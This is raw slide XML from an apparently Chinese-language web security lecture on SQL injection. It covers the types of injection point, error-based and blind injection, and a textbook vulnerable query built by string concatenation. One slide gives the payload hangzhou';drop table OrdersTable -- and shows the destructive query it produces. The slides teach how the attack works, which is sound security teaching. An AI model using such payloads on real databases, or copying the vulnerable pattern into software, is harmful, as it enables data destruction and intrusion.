            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>按照注入点类型来分类</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77" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496306" y="584372"/>
            <a:ext cx="10205721" cy="574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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>GET 注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	提交数据的方式是 GET , 注入点的位置在 GET 参数部分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://www.xxx.com/article.php?id=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>POST 注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	使用 POST 方式提交数据，注入点位置在 POST 数据部分，常发生在表单中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cookie 注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>HTTP 头部注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	注入点在 HTTP 请求头的某些字段中。比如 User-Agent 、X-Forwarded-For字段等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="153987"/>
            <a:ext cx="6500978" cy="1264493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="362204">
              <a:defRPr sz="4200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>按照数据提交的方式来分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50800" y="5359573"/>
            <a:ext cx="6253080" cy="787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502412">
              <a:defRPr sz="4400">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>按照执行效果来分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527256" y="4870623"/>
            <a:ext cx="11440644" cy="463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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>基于报错注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	这一类的也叫有回显注入，页面会返回错误信息，或把注入语句的结果直接返回在页面中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>基于布尔的盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	根据返回页面的结果判断构造的SQL条件语句的真假性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	比如我们常用的经典 and 1=2 ，or 1=2 之类的就是这种。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>基于时间的盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	当根据页面返回的信息不够用时，使用条件语句查看时间延迟语句是否执行，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	也就是看页面返回时间是否增长来判断是否执行。</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4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="182" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="181" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="180"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492125" y="1973261"/>
            <a:ext cx="24003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典型例子：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527050" y="2992437"/>
            <a:ext cx="12446000" cy="238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solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>var ShipCity;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ShipCity = Request.from(“ShipCity”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>var sql = “select * from OrdersTable where ShipCity = ‘“+ShipCity + ” ’ ”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484187" y="5708648"/>
            <a:ext cx="1106286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变量ShipCity由用户输入，正常输入“hangzhou”，执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611187" y="6773861"/>
            <a:ext cx="942822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rgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>select * from OrdersTable where ShipCity = ‘hangzhou’</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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="186" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="185" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="188" grpId="4"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806449" y="3081336"/>
            <a:ext cx="975207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输入hangzhou’;drop table OrdersTable - - 执行 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806449" y="4195762"/>
            <a:ext cx="1139037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rgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>select * from OrdersTable where ShipCity = ‘hangzhou’;drop table OrdersTable - -‘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665161" y="6065836"/>
            <a:ext cx="11671403"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正常是一个查询的语句，注入后，先执行来一个查询后，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>drop了一个表，成功的完成了一次攻击。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4081462" y="2054224"/>
            <a:ext cx="50926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mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>盲注（Blind Injection）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Shape 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382586" y="3237706"/>
            <a:ext cx="12238040"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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>web服务器关闭了错误回显，这时候就需要盲注的技巧。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>盲注，就是在服务器没有错误回显时完成注入攻击。服务器没有错误回显，对于攻击者来说却少了十分重要的“调试信息”，所以攻击者必须找一个方法来验证注入的sql语句是否执行。</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ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>什么是Web安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2093911" y="2932111"/>
            <a:ext cx="9088439" cy="5129215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45718" tIns="45718" rIns="45718" bIns="45718" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="3200">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:t>的互联网应用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>网购、网银、网游 、网络教学</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="宋体"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="宋体"/>
              <a:sym typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>手机购物、手机银行、手机游戏</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="宋体"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="宋体"/>
              <a:sym typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>安全威胁 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="宋体"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="宋体"/>
              <a:sym typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>网站平台  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>缓冲区溢出、配置错误、弱口令</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>--Web</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>服务程序  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>、挂马、认证</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>--Web</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>用户  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="宋体"/>
                <a:sym typeface="宋体"/>
              </a:rPr>
              <a:t>钓鱼、窃听、木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition spd="slow" advClick="1" p14:dur="1250">
        <p:circ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
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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 grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="38" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="1008855"/>
            <a:ext cx="24003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典型例子：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044599" y="1817686"/>
            <a:ext cx="427985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一个网站的url如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
